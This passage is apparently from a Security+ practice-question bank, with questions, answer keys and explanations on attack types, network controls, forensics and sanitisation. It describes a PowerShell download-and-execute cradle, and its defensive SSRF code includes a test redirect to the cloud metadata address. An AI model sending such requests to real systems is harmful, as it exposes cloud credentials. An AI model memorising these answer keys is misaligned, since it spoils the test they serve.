The exhibit shows a PowerShell command that downloads and executes a payload directly in memory without writing to disk. This is a classic indicator of a fileless attack, where malicious code runs in volatile memory (e.g., via PowerShell, WMI, or macros) to evade traditional file-based antivirus detection. The use of `Invoke-Expression` (IEX) with a remote URL confirms the attack vector is fileless.

Exam trap

The trap here is that candidates see a PowerShell command and assume it is a worm or ransomware, but the key detail is the in-memory execution (no file written) which is the hallmark of a fileless attack, not the payload's ultimate goal.

How to eliminate wrong answers

Option A is wrong because ransomware typically encrypts files and leaves ransom notes, but the exhibit shows no evidence of file encryption or ransom demands—only a suspicious PowerShell download cradle. Option C is wrong because worm propagation requires self-replicating code that spreads across networks without user interaction, whereas the exhibit shows a single command executed on one workstation with no lateral movement indicators. Option D is wrong because rootkit persistence involves hiding processes or files at the kernel level (e.g., via driver hooks or MBR modification), but the exhibit shows a one-time in-memory execution with no persistence mechanism like scheduled tasks or registry run keys.

953
MCQ · medium

A weekly scan reports three findings: a medium-severity missing patch on a lab VM with no network access, a high-severity default credential on a management interface reachable from the internet, and a low-severity outdated browser plug-in on a visitor kiosk. Which issue should be remediated first?

A. The medium-severity missing patch on the isolated lab VM.
B. The low-severity outdated browser plug-in on the visitor kiosk.
C. The high-severity default credential on the management interface exposed to the internet.
D. All three issues have the same priority because they were found in the same scan cycle.
Answer: C

Exposure and exploitability drive priority. A default credential on an internet-reachable management interface presents immediate unauthorized access risk and should be addressed before issues on isolated or lower-risk assets.

Why this answer

Option C is correct because the high-severity default credential on a management interface reachable from the internet represents an immediate, exploitable risk. Default credentials are well-known and can be used by attackers to gain full administrative control over the device, often leading to a complete compromise of the network. In contrast, the other findings have compensating controls (no network access) or lower impact (outdated browser plug-in), making them lower priority in a risk-based remediation strategy.

Exam trap

The trap here is that candidates focus solely on the severity label (high vs. medium vs. low) without considering the compensating controls or exposure, leading them to incorrectly rank the missing patch or outdated plug-in as higher priority.

How to eliminate wrong answers

Option A is wrong because the lab VM has no network access, which means the missing patch cannot be exploited remotely; the risk is contained and can be remediated later. Option B is wrong because an outdated browser plug-in on a visitor kiosk is low severity and typically has limited attack surface (e.g., no saved credentials, restricted user privileges), so it does not pose an immediate threat compared to an internet-exposed default credential. Option D is wrong because not all findings have the same priority; risk severity is determined by both the vulnerability's severity and the exposure/impact, and the high-severity default credential with internet exposure clearly outweighs the others.

954
MCQ · hard

A facilities manager receives an SMS from "FedEx Delivery" saying a shipment for the research lab cannot clear security until the recipient verifies the package by signing in. The message includes the manager's initials and the warehouse code, and the link opens a cloned sign-in page. Which attack is most likely?

A. Smishing, because the attacker is using a text message to deliver a targeted credential lure.
B. Vishing, because the attacker is pretending to be a delivery service representative.
C. Spear phishing, because the message is targeted using the recipient's role and location.
D. Baiting, because the message offers a shipment verification reward to encourage action.
Answer: A

Smishing is the best answer because the attack arrives by SMS and is designed to push the victim to a fake login page. The personalized details make it more convincing, but the defining factor is the text-message delivery channel combined with credential harvesting. This is a common real-world approach for bypassing inbox filtering and exploiting mobile trust.

Why this answer

Smishing is a social engineering attack that uses SMS (Short Message Service) to deliver a fraudulent message designed to trick the recipient into revealing sensitive information. In this scenario, the attacker sends a text message impersonating FedEx, includes the manager's initials and warehouse code for personalization, and provides a link to a cloned sign-in page, which is the classic credential-harvesting mechanism of a smishing attack.

Exam trap

The trap here is that candidates confuse the targeted nature of the message (which suggests spear phishing) with the delivery vector (SMS), but the exam specifically tests the distinction between phishing subtypes based on the communication channel used.

How to eliminate wrong answers

Option B is wrong because vishing (voice phishing) involves a phone call, not an SMS text message; the attack described uses a text message with a link, not a voice call. Option C is wrong because spear phishing is a form of email-based phishing that targets a specific individual or organization; while the message is targeted, the delivery method is SMS, not email, making smishing the more precise classification.

955
MCQ · medium

Based on the exhibit, which network redesign would best limit lateral movement between user endpoints and building systems after a workstation compromise?

A. Move every device into a single flat subnet so internal routing is simpler.
B. Separate workstations, phones, badge readers, and cameras into different VLANs with ACLs or firewall rules between them.
C. Keep the design unchanged and rely on antivirus on the workstations to block access to the cameras.
D. Put all traffic through the guest Wi-Fi VLAN to isolate it from the corporate network.
Answer: B

Separating device classes into distinct VLANs creates clear trust boundaries and limits what a compromised endpoint can reach. Inter-VLAN ACLs or firewall rules can then enforce only the necessary traffic paths, such as management or service traffic. This reduces lateral movement from a workstation to sensitive building systems like cameras and badge readers.

Why this answer

Option B is correct because segmenting workstations, phones, badge readers, and cameras into separate VLANs with ACLs or firewall rules between them enforces micro-segmentation. This prevents a compromised workstation from directly initiating lateral movement to building systems (e.g., cameras or badge readers) by restricting inter-VLAN traffic at Layer 3/4, limiting the blast radius of an attack.

Exam trap

The trap here is that candidates often think antivirus or a flat network simplifies management, but the SY0-701 exam specifically tests the principle of network segmentation to contain lateral movement, not just endpoint protection or network simplicity.

How to eliminate wrong answers

Option A is wrong because a single flat subnet removes all network segmentation, allowing any compromised endpoint to directly communicate with any other device (including building systems) via Layer 2 broadcast or unicast, which maximizes lateral movement risk. Option C is wrong because relying solely on antivirus on workstations does not block network-level access to cameras; antivirus is a host-based detection tool that cannot prevent a compromised workstation from sending malicious traffic to other IP addresses on the same subnet. Option D is wrong because putting all traffic through the guest Wi-Fi VLAN would isolate it from the corporate network, but it would also isolate building systems from necessary management traffic and does not provide granular segmentation between different device types; it also introduces performance and policy issues for non-Wi-Fi devices.

956
MCQ · medium

A security architect is designing the network security for a web application hosted in a public cloud environment such as AWS. The application uses an Application Load Balancer (ALB) that distributes traffic to a fleet of web servers. The web servers must only accept traffic from the ALB, and all other inbound traffic must be blocked. The ALB itself needs to accept HTTP/HTTPS traffic from anywhere on the internet. Which of the following cloud security controls should the architect configure on the web servers' network interface to best meet this requirement, assuming the cloud provider offers both stateful and stateless network filtering options?

A. A stateless network ACL that allows inbound traffic from the ALB's subnet only.
B. A stateful security group that allows inbound traffic from the ALB's security group only.
C. A web application firewall (WAF) that inspects all traffic for SQL injection.
D. A host-based firewall on each web server that allows traffic from the ALB's private IP address.
Answer: B

Correct. Security groups are stateful and can use another security group as a source. This configuration cleanly allows only traffic originating from the ALB, automatically handles return traffic, and is the recommended cloud-native approach for controlling instance-level access.

Why this answer

Option B is correct because a stateful security group in AWS can reference another security group as a source, allowing inbound traffic only from instances associated with the ALB's security group. This ensures that web servers accept traffic exclusively from the ALB, while the ALB itself can accept HTTP/HTTPS from the internet via its own security group rules. Stateful filtering automatically allows return traffic, simplifying rule management and meeting the requirement precisely.

Exam trap

The trap here is that candidates often confuse stateless network ACLs with stateful security groups, assuming a subnet-based ACL is sufficient, but they overlook that ACLs cannot filter by security group and require bidirectional rule management, making them unsuitable for this precise ALB-only access requirement.

How to eliminate wrong answers

Option A is wrong because a stateless network ACL requires explicit inbound and outbound rules, and referencing a subnet rather than a security group does not restrict traffic to only the ALB—any instance in that subnet could send traffic, violating the requirement. Additionally, stateless ACLs do not automatically allow return traffic, requiring separate outbound rules, which adds complexity and potential misconfiguration. Option C is wrong because a web application firewall (WAF) inspects application-layer traffic for threats like SQL injection but does not control network-layer access; it cannot block all non-ALB traffic at the network interface level, so it fails to meet the core requirement of restricting inbound traffic to only the ALB.

957
MCQ · medium

A resolver log shows multiple clients querying the correct internal host name, but the DNS server starts returning an unexpected public IP address after a burst of unsolicited DNS responses from outside the network. Users are sent to a lookalike login page. What type of attack is most likely occurring?

A. DNS poisoning
B. Brute-force authentication
C. Port scanning
D. Packet sniffing
Answer: A

DNS poisoning is the best fit when incorrect DNS records or forged responses cause clients to resolve a legitimate name to a malicious address.

Why this answer

The scenario describes a DNS poisoning (also known as DNS cache poisoning) attack. The burst of unsolicited DNS responses from outside the network is the attacker injecting forged DNS records into the resolver's cache, causing it to map the correct internal host name to an unexpected public IP address. This redirects users to a lookalike login page, which is the classic outcome of DNS poisoning.

Exam trap

The trap here is that candidates may confuse DNS poisoning with packet sniffing because both involve network traffic, but only DNS poisoning actively modifies cached resolution data to redirect users.

How to eliminate wrong answers

Option B is wrong because brute-force authentication involves repeatedly trying passwords against a login interface, not manipulating DNS responses to redirect traffic. Option C is wrong because port scanning is used to discover open ports on a target system, not to alter DNS resolution or redirect users to a fake site. Option D is wrong because packet sniffing passively captures network traffic for analysis, but it does not inject forged DNS responses or modify the resolver's cache.

958
Multi-Select · hard

A records manager finds paper onboarding forms and scanned copies that contain government ID numbers. The retention period has expired, no legal hold exists, and the forms are no longer needed. Which three actions should occur before disposal? Select three.

Select 3 answers
A. Verify the retention schedule and confirm that no legal hold or exception applies.
B. Move the forms to an unsecured archive so they can be retrieved later if needed.
C. Destroy the paper copies with an approved secure method such as cross-cut shredding or pulping.
D. Securely delete the electronic copies from active storage and follow backup-retention rules for residual copies.
E. Keep personal copies because auditors might ask informally later.
Answers: A, C, D

You should never destroy records until retention and legal obligations are checked and documented.

Why this answer

Option A is correct because before any disposal, the records manager must verify the retention schedule and confirm that no legal hold or exception applies. This ensures compliance with organizational policy and legal requirements, preventing premature destruction of records that may still be needed for litigation or audit purposes.

Exam trap

The trap here is that candidates may think moving records to an unsecured archive (Option B) is a safe intermediate step, but the CompTIA SY0-701 exam emphasizes that once retention expires and no hold exists, secure destruction is mandatory—not relocation.

959
MCQ · hard

Based on the exhibit, which access change best follows least privilege while still allowing the help desk to complete the task?

A. Add helpdesk_27 to Domain_Admin for seven days, since the request is urgent and time-limited.
B. Use a shared administrator password so the technician can finish the ticket without changing group memberships.
C. Grant helpdesk_27 the Helpdesk_Admin role for the ticket and remove it after completion.
D. Ask the user's manager to perform the reset manually so the help desk does not need additional access.
Answer: C

Granting the narrower Helpdesk_Admin role is the best least-privilege choice because it gives the technician only the permissions needed to unlock the account and reset MFA. The role is specific to the job function and can be removed after the ticket is complete. That limits exposure while still allowing the work to be finished efficiently.

Why this answer

Option C is correct because it implements Role-Based Access Control (RBAC) by granting the help desk technician a temporary, ticket-specific role (Helpdesk_Admin) that provides just enough privileges to perform the password reset without granting broader administrative rights. This follows the principle of least privilege by limiting the elevated access to the exact scope and duration needed, and the role can be automatically revoked after the ticket is closed, minimizing the attack surface.

Exam trap

The trap here is that candidates may choose Option A because it appears to limit the duration of elevated access, but they overlook that Domain_Admin membership provides far more privileges than needed for a single password reset, violating the core principle of least privilege.

How to eliminate wrong answers

Option A is wrong because adding helpdesk_27 to Domain_Admin grants full domain administrative privileges, which far exceed what is needed for a single password reset and violates least privilege by providing persistent, overly broad access even if time-limited. Option B is wrong because using a shared administrator password violates the principle of non-repudiation (no individual accountability) and introduces a shared credential security risk, as all actions would be attributed to the shared account rather than the specific technician. Option D is wrong because it bypasses the help desk's role entirely and places an operational burden on the user's manager, which is inefficient, not scalable, and does not address the need for the help desk to have appropriate access to perform their job function.

960
MCQ · medium

A company portal lets employees save a short profile bio. One employee enters a string containing script code, and later other users who view that profile are redirected to a fake sign-in page. What vulnerability best explains this behavior?

A. Reflected cross-site scripting, because the payload only appears in the current request response.
B. Stored cross-site scripting, because the malicious script is saved and served to other users later.
C. Command injection, because the script runs inside the web server process.
D. Session fixation, because the attacker wants the victim to use an old session ID.
Answer: B

Stored XSS occurs when malicious script is persisted by the application, such as in a profile field, comment, or message. Every user who later loads the page receives the harmful content. The redirection to a fake sign-in page shows that the script is executing in other users’ browsers, which makes this a stored, not reflected, attack. Proper output encoding and input handling are needed to prevent it.

Why this answer

The employee's profile bio is saved to the server and later served to other users who view the profile. This is the defining characteristic of stored (persistent) cross-site scripting (XSS): the malicious script is permanently stored on the target server and executed in the browsers of other users when they retrieve the stored data.

Exam trap

The trap here is confusing stored XSS with reflected XSS by focusing on the 'current request' aspect rather than recognizing that the payload is saved and served to other users later, which is the key differentiator.

How to eliminate wrong answers

Option A is wrong because reflected XSS requires the payload to be part of the current request (e.g., in a URL parameter or form input) and is not permanently stored; it only affects the user who submits the request. Option C is wrong because command injection targets the server-side operating system by injecting system commands (e.g., via shell metacharacters like ';' or '|'), not client-side script execution in a browser.

961
Multi-Select · medium

A company-owned laptop is suspected in an insider theft case and legal says the evidence may be used in court. Which two actions best support evidence admissibility during transport to the evidence locker? Select two.

Select 2 answers
A. Document the chain of custody with the collector, date, time, device condition, and transfer history.
B. Place the laptop in a tamper-evident bag or seal and record the seal number.
C. Browse the user's files to confirm whether the laptop contains stolen documents.
D. Remove the hard drive and place it in an unmarked box for convenience.
E. Let the employee continue using the laptop until legal staff are available.
Answers: A, B

This is essential because admissibility depends on showing who handled the evidence, when they handled it, and whether it remained intact. Detailed chain-of-custody records help prove the item was not altered or contaminated. Courts and legal teams rely on this documentation to establish integrity from collection through storage and analysis.

Why this answer

Option A is correct because documenting the chain of custody establishes a clear, unbroken record of who handled the evidence, when, and under what conditions. This is critical for admissibility in court, as it demonstrates that the evidence has not been tampered with or altered since collection. Without proper chain-of-custody documentation, the defense could argue that the laptop's integrity was compromised, potentially rendering the evidence inadmissible.

Exam trap

The trap here is that candidates might think previewing files is a valid investigative step, but in forensic evidence handling, any access to the original data must be done through a write-blocker and on a forensic copy, not by browsing the live system, to avoid altering evidence.

962
MCQ · medium

A security architect is designing a new data center network that will host public-facing web servers and internal application servers handling confidential employee data. The architect places the web servers in a DMZ and the internal application servers on a separate internal network segment. A stateful firewall is configured to allow inbound HTTP/HTTPS traffic from the internet to the web servers only. The firewall also permits only the web servers to initiate outbound connections to the internal application servers on a specific TCP port, and all such traffic is encrypted using TLS. Which security architecture principle is this design primarily intended to enforce?

A. Least privilege
B. Defense in depth
C. Separation of duties
D. Zero trust
Answer: B

Correct. The design uses network segmentation, firewalls, and encryption to create multiple layers of defense. This is the core concept of defense in depth, ensuring that a failure in one layer does not compromise the entire system.

Why this answer

The design enforces defense in depth by layering multiple security controls: a DMZ isolates public-facing web servers from internal networks, a stateful firewall restricts inbound traffic to HTTP/HTTPS only, and outbound connections from web servers to internal application servers are limited to a specific TCP port with TLS encryption. This layered approach ensures that even if one control fails (e.g., a web server is compromised), the attacker still faces additional barriers to reach sensitive internal systems.

Exam trap

The trap here is that candidates confuse 'defense in depth' with 'least privilege' because both involve restricting access, but defense in depth specifically refers to multiple overlapping security layers (network segmentation, firewalls, encryption) rather than minimal permissions for a single component.

How to eliminate wrong answers

Option A is wrong because least privilege would focus on granting only the minimum necessary permissions to users or processes, but the scenario describes network segmentation and traffic filtering, not user or service account permissions. Option C is wrong because separation of duties involves dividing critical tasks among different individuals to prevent fraud or error, whereas this design is about network architecture and access controls, not role-based task division.

963
MCQ · medium

After a ransomware event, the team restores a file server from backup, but management wants proof that the restore process will work before the backups are declared trusted. What should be done next?

A. Delete the old backup copies to prevent future confusion
B. Perform a test restore in an isolated environment and verify the recovered data
C. Switch to incremental backups only so the next restore is faster
D. Store the backups on the same file server so they are easier to access
Answer: B

A test restore is the best way to validate backup integrity and operational readiness after an incident. Restoring in isolation confirms that the backup can be used successfully without risking production systems. Verification should include checking file integrity, application access if relevant, and whether the restored data meets recovery objectives. This provides evidence that backups remain trustworthy after ransomware.

Why this answer

Option B is correct because the only way to prove that backups are trustworthy is to perform a test restore in an isolated environment, verifying the integrity and completeness of the recovered data. This validates that the backup process, media, and software are functioning correctly without risking the production environment. Without a successful test restore, the team cannot confirm that the backups are free from corruption, encryption, or other issues that would prevent a real recovery.

Exam trap

The trap here is that candidates may think simply having backups is sufficient proof of recoverability, but the exam emphasizes that only a successful test restore in an isolated environment can validate the backup's integrity and the restore process itself.

How to eliminate wrong answers

Option A is wrong because deleting old backup copies does not prove the restore process works and actually removes potentially valuable recovery points, violating the 3-2-1 backup rule. Option C is wrong because switching to incremental backups only does not validate the current restore process; it changes the backup strategy without addressing the need for proof of recoverability, and incremental backups actually require a full backup chain to restore, increasing complexity. Option D is wrong because storing backups on the same file server violates the fundamental principle of backup isolation, making them vulnerable to the same ransomware attack that encrypted the original data, and it does not test the restore process at all.

964
MCQ (medium)

A cloud-hosted API lets users supply a URL for the service to fetch an image. Shortly after release, logs show requests to 169.254.169.254 and internal admin addresses. What control best reduces this risk?

A. Allow the API to follow any redirect so it works with more image sources.
B. Restrict outbound requests to an allowlist and block internal address ranges.
C. Store the fetched image in encrypted form before sending it to users.
D. Increase the session timeout to reduce repeated logins by legitimate users.
Answer: B

This is a classic server-side request forgery pattern: the server is making attacker-influenced requests to internal or metadata addresses. An allowlist of approved destinations, combined with blocking private and link-local ranges, prevents the service from being used as a proxy into internal systems. That control directly targets the unsafe outbound request behavior and is more effective than trying to clean malicious URLs after the fact. It also reduces exposure to cloud metadata theft and internal service probing.

Why this answer

Option B is correct because restricting outbound requests to an allowlist and blocking internal address ranges directly mitigates the Server-Side Request Forgery (SSRF) vulnerability. The requests to 169.254.169.254 (the AWS/GCP/Azure metadata endpoint) and internal admin addresses indicate an attacker is using the API to probe internal services. An allowlist ensures the API only connects to trusted external hosts, while blocking private and link-local ranges prevents access to internal infrastructure.

Exam trap

The trap here is that candidates may confuse data-at-rest protection (encryption) with access control, or mistakenly think allowing redirects improves functionality without realizing it exacerbates SSRF; Cisco often tests the specific cloud metadata endpoint (169.254.169.254) as a classic SSRF indicator.

How to eliminate wrong answers

Option A is wrong because allowing the API to follow any redirect would actually increase the SSRF risk, as an attacker could craft a redirect from an allowed external URL to an internal or metadata endpoint, bypassing initial URL checks. Option C is wrong because storing the fetched image in encrypted form does not prevent the API from making unauthorized requests to internal or metadata endpoints; encryption protects data at rest, not the request origin or destination.
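The control described in Option B, as an added example that is not part of the exam page: every destination (including each redirect hop, the trap in Option A) is checked against a hostname allowlist and every resolved address is rejected if it falls in a private, loopback or link-local range. The allowlist, the offline DNS table, the fake upstream responses and all IP addresses are constructed for illustration.

```python
"""Destination check for a URL-fetching API (server-side request forgery defence).

Added example, not code from the exam page. The allowlist, the offline
DNS table, the fake web responses and all addresses are constructed.
"""
import ipaddress
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.com", "cdn.example.net", "partner.example.net"}
MAX_REDIRECTS = 3

# Constructed DNS answers so the example runs offline. A real service
# would call socket.getaddrinfo and check every address it returns.
FAKE_DNS = {
    "images.example.com": ["93.184.216.34"],
    "cdn.example.net": ["93.184.216.35", "93.184.216.36"],
    "partner.example.net": ["93.184.216.40", "10.0.0.5"],   # split answer
    "evil.example.org": ["93.184.216.99"],
}

def resolve(host):
    return FAKE_DNS.get(host, [])

def is_internal(addr: str) -> bool:
    """True for any address the fetcher must never contact: RFC 1918,
    loopback, link-local (covers 169.254.169.254), reserved, multicast."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def check_url(url: str, resolver=resolve):
    """Return (ok, reason); ok is True only when every check passes."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:                                      # literal IPs bypass the name
        ipaddress.ip_address(host)            # allowlist, so reject them
        return False, "literal IP addresses are not allowed"
    except ValueError:
        pass
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    addrs = resolver(host)
    if not addrs:
        return False, f"host {host!r} did not resolve"
    for a in addrs:                           # every answer must be external
        if is_internal(a):
            return False, f"host {host!r} resolves to internal address {a}"
    return True, "ok"

# Constructed upstream responses: (status, body or Location header).
FAKE_WEB = {
    "https://images.example.com/cat.png": (200, b"\x89PNG...constructed"),
    "https://cdn.example.net/logo": (302, "https://images.example.com/cat.png"),
    "https://images.example.com/redir": (302, "http://169.254.169.254/latest/meta-data/"),
}

def fake_fetch(url):
    return FAKE_WEB.get(url, (404, b""))

def fetch_image(url: str, fetcher=fake_fetch, resolver=resolve):
    """Follow redirects manually so each hop is re-checked; an allowed
    external URL that redirects to the metadata endpoint is blocked."""
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = check_url(url, resolver)
        if not ok:
            return None, f"blocked: {reason}"
        status, payload = fetcher(url)
        if status in (301, 302, 303, 307, 308):
            url = payload                     # Location header, re-validated next loop
            continue
        if status == 200:
            return payload, "ok"
        return None, f"upstream returned {status}"
    return None, "blocked: too many redirects"
```

In a real deployment the connection should be made to the address that was checked, not re-resolved afterwards, so that a DNS answer cannot change between the check and the request.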

965
MCQ (hard)

A stateless firewall sits between a DMZ subnet 10.10.10.0/24 and an internal subnet 10.10.20.0/24. Only the web server at 10.10.10.25 should be allowed to initiate TCP sessions to the app server at 10.10.20.20 on port 8443. All other DMZ-to-internal traffic must remain blocked. Which ACL entry is the best fit on the DMZ-facing interface?

A. deny tcp 10.10.10.0/24 10.10.20.0/24 eq 8443 followed by permit ip any any
B. permit tcp host 10.10.10.25 host 10.10.20.20 eq 8443 followed by deny ip any any
C. permit tcp host 10.10.20.20 host 10.10.10.25 eq 8443 followed by deny ip any any
D. permit ip 10.10.10.0/24 10.10.20.0/24 followed by deny ip any any
Answer: B

This rule is the least-privilege match for the stated requirement. It allows only the specific source host, destination host, and destination port needed for the application flow, while the explicit deny blocks all remaining DMZ-to-internal traffic on that interface. Because the firewall is stateless, narrowing the source and destination at the entry point is the safest way to prevent unintended exposure.

Why this answer

Option B is correct because it explicitly permits only the web server at 10.10.10.25 to initiate TCP sessions to the app server at 10.10.20.20 on port 8443, then denies all other traffic. Since the firewall is stateless, it cannot track session state, so the ACL must be applied on the DMZ-facing interface to control outbound-initiated traffic from the DMZ to the internal subnet. The permit statement uses the 'host' keyword for precise source and destination, followed by an explicit deny all to block any other DMZ-to-internal traffic.

Exam trap

The trap here is that candidates often reverse the source and destination in the permit statement (as in Option C), mistakenly thinking the ACL should allow the app server to respond, rather than correctly permitting the web server to initiate the connection from the DMZ to the internal subnet.

How to eliminate wrong answers

Option A is wrong because it denies the specific traffic (TCP from 10.10.10.0/24 to 10.10.20.0/24 on port 8443) that should be permitted, and then permits all other traffic, which would allow unauthorized DMZ hosts to reach the internal subnet. Option C is wrong because it reverses the source and destination, permitting the app server at 10.10.20.20 to initiate sessions to the web server on port 8443, which violates the requirement that only the web server should initiate the connection. Option D is wrong because it permits all IP traffic from the entire DMZ subnet to the internal subnet, which would allow any DMZ host to reach any internal host, completely bypassing the restriction to only the web server and only on port 8443.
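To see why only Option B fits, here is an added example (not from the exam page) that parses the entry syntax used in the four options, applies first-match evaluation with an implicit deny, and runs each candidate ACL against constructed packets entering the DMZ-facing interface. The Packet and Entry types, the test packets and the helper names are assumptions made for this illustration.

```python
"""Stateless ACL evaluator for the DMZ-to-internal scenario.

Added example, not from the exam page. Parses the entry syntax the
answer options use and checks each candidate ACL against constructed
test packets. Everything here is constructed for illustration.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str      # "tcp" or "udp"
    dport: int

@dataclass(frozen=True)
class Entry:
    action: str                     # "permit" or "deny"
    proto: str                      # "ip", "tcp" or "udp"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    dport: Optional[int]            # None means any destination port

    def matches(self, p: Packet) -> bool:
        if self.proto != "ip" and self.proto != p.proto:
            return False
        if ipaddress.ip_address(p.src) not in self.src:
            return False
        if ipaddress.ip_address(p.dst) not in self.dst:
            return False
        return self.dport is None or self.dport == p.dport

def _network(tokens: List[str]) -> ipaddress.IPv4Network:
    """Consume one address spec: 'any', 'host A.B.C.D' or 'A.B.C.D/nn'."""
    tok = tokens.pop(0)
    if tok == "any":
        return ipaddress.ip_network("0.0.0.0/0")
    if tok == "host":
        return ipaddress.ip_network(tokens.pop(0) + "/32")
    return ipaddress.ip_network(tok, strict=False)

def parse_entry(text: str) -> Entry:
    tokens = text.split()
    action, proto = tokens.pop(0), tokens.pop(0)
    if action not in ("permit", "deny"):
        raise ValueError(f"bad action {action!r}")
    src, dst = _network(tokens), _network(tokens)
    dport = int(tokens[1]) if tokens and tokens[0] == "eq" else None
    return Entry(action, proto, src, dst, dport)

def parse_acl(text: str) -> List[Entry]:
    """Entries are joined by 'followed by', exactly as the options are written."""
    return [parse_entry(part.strip()) for part in text.split("followed by")]

def evaluate(acl: List[Entry], p: Packet) -> str:
    """First matching entry wins; anything unmatched hits the implicit deny."""
    for e in acl:
        if e.matches(p):
            return e.action
    return "deny"

# Constructed packets entering the DMZ-facing interface from the DMZ side.
WEB, APP, OTHER_DMZ, OTHER_INT = "10.10.10.25", "10.10.20.20", "10.10.10.77", "10.10.20.50"
REQUIRED: Dict[Packet, str] = {                 # packet -> verdict the requirement demands
    Packet(WEB, APP, "tcp", 8443): "permit",    # the one approved flow
    Packet(OTHER_DMZ, APP, "tcp", 8443): "deny",
    Packet(WEB, APP, "tcp", 22): "deny",
    Packet(WEB, OTHER_INT, "tcp", 8443): "deny",
    Packet(OTHER_DMZ, OTHER_INT, "udp", 53): "deny",
}

OPTIONS = {
    "A": "deny tcp 10.10.10.0/24 10.10.20.0/24 eq 8443 followed by permit ip any any",
    "B": "permit tcp host 10.10.10.25 host 10.10.20.20 eq 8443 followed by deny ip any any",
    "C": "permit tcp host 10.10.20.20 host 10.10.10.25 eq 8443 followed by deny ip any any",
    "D": "permit ip 10.10.10.0/24 10.10.20.0/24 followed by deny ip any any",
}

def satisfies_requirement(acl_text: str) -> bool:
    acl = parse_acl(acl_text)
    return all(evaluate(acl, p) == want for p, want in REQUIRED.items())

def options_that_fit() -> List[str]:
    return [name for name, text in OPTIONS.items() if satisfies_requirement(text)]
```

Because the firewall is stateless, the return packets from 10.10.20.20 port 8443 back to 10.10.10.25 arrive on the internal-facing interface and need their own permit entry there; none of the candidate ACLs covers that direction, which is a separate rule set from the one the question asks about.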

966
MCQ (easy)

A new SIEM rule generates many alerts from a scheduled backup job that is known to be legitimate. What should the analyst do to improve alert quality?

A. Disable all logging for the backup server.
B. Tune the rule to exclude the known backup activity pattern.
C. Ignore the alerts permanently because the job is approved.
D. Reimage the backup server to stop the alerts.
Answer: B

Alert tuning should reduce false positives without losing useful detection. If the backup job is documented and legitimate, the analyst can adjust the rule to exclude that approved activity pattern or server. This keeps the SIEM useful and helps responders focus on real suspicious behavior instead of repeated harmless alerts.

Why this answer

Option B is correct because tuning the SIEM rule to exclude the known backup activity pattern reduces false positives while preserving detection of actual threats. By creating an exception for the specific backup server's IP, schedule, or process hash, the analyst maintains visibility into anomalous behavior without being overwhelmed by noise.

Exam trap

The trap here is that candidates may choose to disable logging or ignore alerts, confusing operational convenience with proper security hygiene, when the correct approach is to refine detection logic through tuning.

How to eliminate wrong answers

Option A is wrong because disabling all logging for the backup server would create a blind spot, preventing detection of real threats like ransomware encrypting backup data or unauthorized access to backup files. Option C is wrong because ignoring alerts permanently violates security monitoring best practices and could allow a malicious actor to hide activity within the backup job's noise. Option D is wrong because reimaging the backup server is an extreme, unnecessary measure that does not address the root cause—the SIEM rule's lack of specificity—and would disrupt operations without solving the alert volume issue.

967
MCQ (medium)

An organization is retiring a batch of laptops with SSDs. All of the systems used full-disk encryption and stored sensitive internal documents. What is the best action before the devices leave the company?

A. Run a quick format and remove the asset tags after the files are deleted.
B. Perform a cryptographic erase by destroying the encryption keys and document the sanitization process.
C. Degauss the SSDs and then store them in the disposal room until pickup.
D. Overwrite the drives once with random data and consider the devices ready for resale.
Answer: B

For encrypted SSDs, destroying the encryption keys is an effective and practical sanitization method because the data becomes unreadable even if the drive is later examined. This approach matches the media type and the fact that full-disk encryption was used. Proper documentation also supports accountability and compliance. It is stronger than merely deleting files or performing a superficial format, which may leave recoverable data behind.

Why this answer

Option B is correct because a cryptographic erase (also known as a crypto-scrub) renders the encrypted data permanently inaccessible by securely destroying the encryption keys. Since the SSDs used full-disk encryption (FDE), the data is already encrypted at rest, and without the keys, the ciphertext is effectively unrecoverable. This method is fast, reliable, and compliant with sanitization standards like NIST SP 800-88, making it the best action before the devices leave the organization.

Exam trap

The trap here is that candidates often choose degaussing (Option C) for SSDs, mistakenly applying a technique that works only for magnetic media like HDDs, while ignoring that cryptographic erase is the proper and efficient method for encrypted solid-state drives.

How to eliminate wrong answers

Option A is wrong because a quick format only removes the file system pointers, not the actual data; the encrypted content remains on the SSD and could potentially be recovered if the encryption keys are still present. Option C is wrong because degaussing SSDs is ineffective—SSDs use flash memory that is not affected by magnetic fields, and degaussing can physically destroy the drive without guaranteeing data removal. Option D is wrong because overwriting SSDs with random data is unreliable due to wear-leveling and over-provisioning; the SSD firmware may remap bad blocks, leaving remnants of the original encrypted data intact.

968
MCQ (medium)

A security analyst receives an automated alert indicating that a standard user account logged in from a geographic location that is unusual for the user, and the login occurred at 3:00 AM local time. The analyst has not yet verified whether this was a successful login or if any additional suspicious activity occurred. According to standard incident response procedures, what should the analyst do NEXT?

A. Disable the user account immediately and reset the password.
B. Conduct a full forensic analysis of the user's workstation.
C. Review the account's recent activity for signs of compromise.
D. Report the incident to law enforcement.
Answer: C

Reviewing recent activity (e.g., successful logins, file access, privilege escalation attempts) is the appropriate analysis step to validate the alert. This helps determine if the account is compromised and guides subsequent containment and eradication actions.

Why this answer

The correct next step is to review the account's recent activity to gather more context. According to the NIST incident response process (Preparation, Detection & Analysis, Containment, Eradication & Recovery, Post-Incident Activity), after detection the analyst should perform analysis to validate the alert and determine the scope. Reviewing recent logins, accessed files, and other actions helps decide if containment is needed.

Immediately disabling the account (A) could be premature if the alert is a false positive or if the user is traveling. Conducting a full forensic analysis (B) is too resource-intensive for a single alert without further evidence. Reporting to law enforcement (D) is not appropriate at this stage; that would occur after a confirmed incident that meets legal thresholds.

969
MCQ (easy)

A business wants to keep operating even if a supplier-related loss occurs, so it purchases cyber insurance to offset possible costs. Which risk treatment is being used?

A. Avoidance, because the company is eliminating the supplier relationship
B. Mitigation, because insurance removes the risk before it happens
C. Acceptance, because the company is doing nothing about the exposure
D. Transfer, because some financial impact is shifted to another party
Answer: D

